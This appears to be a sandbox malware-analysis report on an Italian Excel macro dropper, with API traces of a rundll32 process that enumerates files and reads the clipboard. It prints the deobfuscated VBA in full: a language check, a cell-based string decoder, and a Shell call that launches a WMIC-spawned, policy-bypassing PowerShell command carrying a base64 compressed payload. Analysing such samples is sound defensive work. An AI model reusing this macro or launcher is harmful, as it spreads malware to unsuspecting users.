Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: PING.EXE PID: 4052 Parent PID: 412

General

Start time:	17:32:39
Start date:	09/12/2019
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping localhost -n 5
Imagebase:	0x480000
File size:	15360 bytes
MD5 hash:	6242E3D67787CCBF4E06AD2982853144
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Foglio1

Declaration

Line	Content
1	Attribute VB_Name = "Foglio1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True
9	Attribute VB_Control = "Notifica, 3, 0, MSForms, Frame"

Executed Functions

Subroutine Notifica_Layout, APIs: 10, Strings: 1, Number of lines: 7, Relevance: 28.007

APIs	Meta Information
InStr	InStr("MIL0001742828.xls","I") -> 2
Name
ActiveWorkbook
Part of subcall function Formato@Questa_cartella_di_lavoro: Close
Part of subcall function Formato@Questa_cartella_di_lavoro: Shell
Part of subcall function Formato@Questa_cartella_di_lavoro: Cells
Part of subcall function Formato@Questa_cartella_di_lavoro: Close
Part of subcall function Formato@Questa_cartella_di_lavoro: Add
Part of subcall function Formato@Questa_cartella_di_lavoro: Workbooks
Close

Strings	Decrypted Strings
"I"

Line	Instruction	Meta Information
10	Private Sub Notifica_Layout()
11	If InStr(ActiveWorkbook.Name, "I") > 0 Then	InStr("MIL0001742828.xls","I") -> 2 Name ActiveWorkbook executed
11	Questa_cartella_di_lavoro.Formato
11	Else
11	ActiveWorkbook.Close savechanges := False	Close
11	Endif
12	End Sub

Module: Questa_cartella_di_lavoro

Declaration

Line	Content
1	Attribute VB_Name = "Questa_cartella_di_lavoro"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Executed Functions

Function Finesta, APIs: 2, Strings: 0, Number of lines: 3, Relevance: 8.753

APIs	Meta Information
LanguageID	LanguageSettings.LanguageID(2) -> 1040
Part of subcall function Riga@Questa_cartella_di_lavoro: msoLanguageIDUI

Line	Instruction	Meta Information
23	Private Function Finesta()
24	Finesta = Application.LanguageSettings.LanguageID(Riga)	LanguageSettings.LanguageID(2) -> 1040 executed
25	End Function

Function hloop, APIs: 16, Strings: 1, Number of lines: 13, Relevance: 25.513

APIs	Meta Information
Part of subcall function g@Questa_cartella_di_lavoro: Int
Part of subcall function g@Questa_cartella_di_lavoro: Rnd
Part of subcall function cash@Questa_cartella_di_lavoro: IIf
Part of subcall function cash@Questa_cartella_di_lavoro: Right
Part of subcall function cash@Questa_cartella_di_lavoro: Left
Part of subcall function cash@Questa_cartella_di_lavoro: Len
Part of subcall function cash@Questa_cartella_di_lavoro: IIf
Part of subcall function cash@Questa_cartella_di_lavoro: Right
Part of subcall function cash@Questa_cartella_di_lavoro: Len
Part of subcall function cash@Questa_cartella_di_lavoro: CInt
Part of subcall function cash@Questa_cartella_di_lavoro: Mid
Part of subcall function cash@Questa_cartella_di_lavoro: Mid
Part of subcall function cash@Questa_cartella_di_lavoro: Chr
Cells
Part of subcall function g@Questa_cartella_di_lavoro: Int
Part of subcall function g@Questa_cartella_di_lavoro: Rnd

Strings	Decrypted Strings
""""

Line	Instruction	Meta Information
32	Function hloop(zoom as Boolean)
33	If zoom = False Then	executed
33	k = 3
33	Else
33	k = 0
33	Endif
34	Z = g
35	team = ""
36	For i = 9 + k To 11 + k
37	team = team + cash(Cells(i, g), 0, 1, 2)	Cells
38	Next i
39	hloop = team
40	End Function

Function cash, APIs: 11, Strings: 1, Number of lines: 30, Relevance: 24.53

APIs	Meta Information
IIf
Right
Left
Len	Len("10175710602409415103111768010316102301406408804114181000116203182761204815733085361625106765142520820218981037381351710163055401605609945149540647412283048051132217273092670842815949142790898203625100441506011158097621291318872124841128511208160350850918843112061197004839148661325714919134340846910027173071914211629154530821218950114590941411123095261594116021173780777709355076371606813332093611093112420163460724708400205751164") -> 431 Len("3709288048770873315072087201635007282123601393015108114690610112186105611437313621112430927509452111651268412138093790786613880094281398907425148581337112970052221643909183096441256805487112591281418762129111592916231110670635408236142641262414609177421670317956118131491011646118321061716481041271427611249125571154016041118510713509400202531480712348109061165515026136161431216104120471127406163124231030512319120850891812245143340991515278081021228") -> 451 Len("53120361264213504185491171413433148161664610160118431142616328143701205813321174441292214269084471447708962101521447810212178710802016138125111486311810143401542912475044720482412541140610840714259098571370217764070730396506755083341231516600191321255009979091031886709730161451261311366097511110112554084171710515535156391570815548110251200915476088270935612637132061881917723139740381812731095680946") -> 401 Len("6413758147111222210973095760822817662074840853708736086850828107738144231136510266104411321011403206551491713842137511382913468091350873908533098861166910478105881031416767105211210917371092721298711707124131174413019164491204014183106821095613502206591365714850086631261514274093531468006812110340992012200188251441617852149061237711430138261474313048115081162415047089701358908432098271791818604147051464615375094311624511461139601410120979069541164") -> 451 Len("0913611147221481210707090191194411146124280672011348075030835210237106270671315516090470535010326131231451808225107451294309551082101113405433113080860514149083411221413330056390992906801094400833813135110170782410300169020935307431055361012111604084060824205815091320564") -> 271 Len("45053530603511028068031172507800140051225510042069141620812739124151165809229157361301812831071471301714522140240703713648118011323810160043211195210126070091260617151112330652712750121540563206204116021532307934108491240715443112120914406146096590424107130078401131009311083191542014356049610351309516111570444") -> 311
IIf
Right
Len	Len("1017571060240941510311176801031610230140640880411418100011620318276120481573308536162510676514252082021898103738135171016305540160560994514954064741228304805113221727309267084281594914279089820362510044150601115809762129131887212484112851120816035085091884311206119700483914866132571491913434084691002717307191421162915453082121895011459094141112309526159411602117378077770935507637160681333209361109311242016346072470840020575116") -> 430 Len("370928804877087331507208720163500728212360139301510811469061011218610561143731362111243092750945211165126841213809379078661388009428139890742514858133711297005222164390918309644125680548711259128141876212911159291623111067063540823614264126241460917742167031795611813149101164611832106171648104127142761124912557115401604111851071350940020253148071234810906116551502613616143121610412047112740616312423103051231912085089181224514334099151527808102122") -> 450 Len("5312036126421350418549117141343314816166461016011843114261632814370120581332117444129221426908447144770896210152144781021217871080201613812511148631181014340154291247504472048241254114061084071425909857137021776407073039650675508334123151660019132125500997909103188670973016145126131136609751111011255408417171051553515639157081554811025120091547608827093561263713206188191772313974038181273109568094") -> 400 Len("641375814711122221097309576082281766207484085370873608685082810773814423113651026610441132101140320655149171384213751138291346809135087390853309886116691047810588103141676710521121091737109272129871170712413117441301916449120401418310682109561350220659136571485008663126151427409353146800681211034099201220018825144161785214906123771143013826147431304811508116241504708970135890843209827179181860414705146461537509431162451146113960141012097906954116") -> 450 Len("091361114722148121070709019119441114612428067201134807503083521023710627067131551609047053501032613123145180822510745129430955108210111340543311308086051414908341122141333005639099290680109440083381313511017078241030016902093530743105536101211160408406082420581509132056") -> 270 Len("4505353060351102806803117250780014005122551004206914162081273912415116580922915736130181283107147130171452214024070371364811801132381016004321119521012607009126061715111233065271275012154056320620411602153230793410849124071544311212091440614609659042410713007840113100931108319154201435604961035130951611157044") -> 310
CInt
Mid
Mid
Chr

Strings	Decrypted Strings
""""

Line	Instruction	Meta Information
46	Function cash(ByVal Sina as String, Ok, uni, tw as Integer) as String
48	Dim ber as Integer	executed
50	Dim caws as Integer
51	Dim DrSam as Integer
52	Dim Trues() as Integer
53	Dim Ffalse() as Long
54	Dim ppis as Integer
56	ppis = IIf(Right(Sina, uni) Mod 2 = Ok, tw * tw + uni, tw * tw)	IIf Right
57	Sina = Left(Sina, Len(Sina) - IIf(Right(Sina, uni) Mod 2 = Ok, uni, uni))	Left Len("10175710602409415103111768010316102301406408804114181000116203182761204815733085361625106765142520820218981037381351710163055401605609945149540647412283048051132217273092670842815949142790898203625100441506011158097621291318872124841128511208160350850918843112061197004839148661325714919134340846910027173071914211629154530821218950114590941411123095261594116021173780777709355076371606813332093611093112420163460724708400205751164") -> 431 IIf Right executed
58	ber = Len(Sina) / ppis - uni	Len("1017571060240941510311176801031610230140640880411418100011620318276120481573308536162510676514252082021898103738135171016305540160560994514954064741228304805113221727309267084281594914279089820362510044150601115809762129131887212484112851120816035085091884311206119700483914866132571491913434084691002717307191421162915453082121895011459094141112309526159411602117378077770935507637160681333209361109311242016346072470840020575116") -> 430 executed
59	Redim Trues(ber)
60	Redim Ffalse(ber)
62	caws = Ok
63	DrSam = Ok
65	For DrSam = Ok To ber
67	Trues(DrSam) = DrSam - (ber + uni)
68	Next DrSam
72	For caws = Ok To ber
73	For DrSam = Ok To ber
74	If CInt(Mid(Sina, DrSam * ppis + uni, ppis - tw - uni)) = caws Then	CInt Mid
75	Ffalse(caws) = (Mid(Sina, (DrSam + uni) * ppis - tw, tw + uni) + Trues(caws))	Mid
76	Exit For
77	Endif
78	Next DrSam
79	Next caws
81	cash = ""
82	For caws = Ok To ber
83	cash = cash & Chr(Ffalse(caws))	Chr
84	Next caws
86	End Function

Subroutine Formato, APIs: 8, Strings: 0, Number of lines: 10, Relevance: 13.51

APIs	Meta Information
Part of subcall function Finesta@Questa_cartella_di_lavoro: LanguageID
Close
Shell	Shell("wMic 'pRocess' Call 'creaTE' "poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop "\"& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( '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) -> 3896
Part of subcall function hloop@Questa_cartella_di_lavoro: Cells
Cells
Close
Add
Workbooks

Line	Instruction	Meta Information
11	Sub Formato()
12	jet = 15	executed
13	If 1040 <> Finesta Then
13	ActiveWorkbook.Close savechanges := False	Close
13	Endif
14	Dim p as Workbook
15	Shell hloop(True) & Cells(15, jet) & hloop(False)	Shell("wMic 'pRocess' Call 'creaTE' "poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop "\"& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( '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) -> 3896 Cells executed
16	ActiveWorkbook.Close savechanges := False	Close
17	Set p = Workbooks.Add	Add Workbooks
18	End Sub

Function g, APIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503

APIs	Meta Information
Int
Rnd

Line	Instruction	Meta Information
28	Function g()
29	g = Int(3 * Rnd) + 3	Int Rnd executed
30	End Function

Function Riga, APIs: 1, Strings: 0, Number of lines: 3, Relevance: 1.253

APIs	Meta Information
msoLanguageIDUI

Line	Instruction	Meta Information
20	Private Function Riga()
21	Riga = msoLanguageIDUI	msoLanguageIDUI executed
22	End Function

Reset < >

Analysis Process: rundll32.exe PID: 2248 Parent PID: 3940 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	19.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	12.6%
Total number of Nodes:	801
Total number of Limit Nodes:	8

Executed Functions

Function 00451098, Relevance: 22.7, APIs: 15, Instructions: 222
filememorytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 004510FF
CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0045113D
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00451151
CloseHandle.KERNELBASE(?), ref: 00451168
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00451174
lstrcat.KERNEL32(?,?), ref: 004511B5
FindFirstFileA.KERNELBASE(?,?), ref: 004511CB
FindNextFileA.KERNELBASE(?,?), ref: 004511FD
StrChrA.SHLWAPI(?,0000002E), ref: 0045126B
memcpy.NTDLL(?,?,00000000), ref: 004512A4
FindNextFileA.KERNELBASE(?,?), ref: 004512B9
CompareFileTime.KERNEL32(?,?), ref: 004512E2
FindClose.KERNELBASE(?), ref: 00451317
HeapFree.KERNEL32(00000000,?,?), ref: 00451329
HeapFree.KERNEL32(00000000,?), ref: 00451339

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: File$Find$CloseFreeHeapNextTime$CompareCreateFirstHandlelstrcatmemcpymemset
String ID:
API String ID: 4183405864-0
Opcode ID: d2eab9018b02a94695f3c14e7e02d8c9f35641b364a6c68d9ec49b030c5c44e9
Instruction ID: dd808a17d1c06bda5436038d115758e9f364b2cdbc019b7b5b536d6db6219f6a
Opcode Fuzzy Hash: d2eab9018b02a94695f3c14e7e02d8c9f35641b364a6c68d9ec49b030c5c44e9
Instruction Fuzzy Hash: 80812E71D00209EFDB119FA5DC84AEFBBB9FF44702F1000A6E915E6262D7749A45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0045593F, Relevance: 18.2, APIs: 12, Instructions: 198
clipboardfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventA.KERNEL32(0045C288,00000001,00000000,00000000,?,00000001,?), ref: 00455A9A
StrChrW.SHLWAPI(?,00000020), ref: 00455AAE

Part of subcall function 00455DD3: memset.NTDLL ref: 00455E49
Part of subcall function 00455DD3: memcpy.NTDLL(00000000,00000000,?,?,?,00000000,?,0045B058,00000000,0045B060), ref: 00455E5F
Part of subcall function 00455DD3: memcpy.NTDLL(771CD9D5,00000000,?,?,?,?,?,?,00000000,?,0045B058,00000000,0045B060), ref: 00455E93

Part of subcall function 004535FF: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?), ref: 00453625
Part of subcall function 004535FF: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000,00000104), ref: 0045366C
Part of subcall function 004535FF: WaitForSingleObject.KERNEL32(00000000,?), ref: 004536D9
Part of subcall function 004535FF: RegCloseKey.KERNEL32(?,00000104), ref: 00453701

WaitForSingleObject.KERNEL32(?,00004E20), ref: 00455ADA
OpenClipboard.USER32(00000000), ref: 00455AEB
GetClipboardData.USER32(00000001), ref: 00455AF7
CloseClipboard.USER32 ref: 00455AFD
CloseHandle.KERNELBASE(?), ref: 00455B06
GetCurrentProcessId.KERNEL32(?,0045B058,00000000,0045B060), ref: 00455B0F
wsprintfW.USER32 ref: 00455B1F
OpenFileMappingW.KERNELBASE(00000004,00000000,?), ref: 00455B2F
MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000), ref: 00455B41
CloseHandle.KERNELBASE(00000000), ref: 00455B4F

Part of subcall function 00455B6B: lstrlen.KERNEL32(00000000,00000000,0045B058,00000027,?,?,00000000,00000000,?,0045B058,00000000,0045B060), ref: 00455BA1
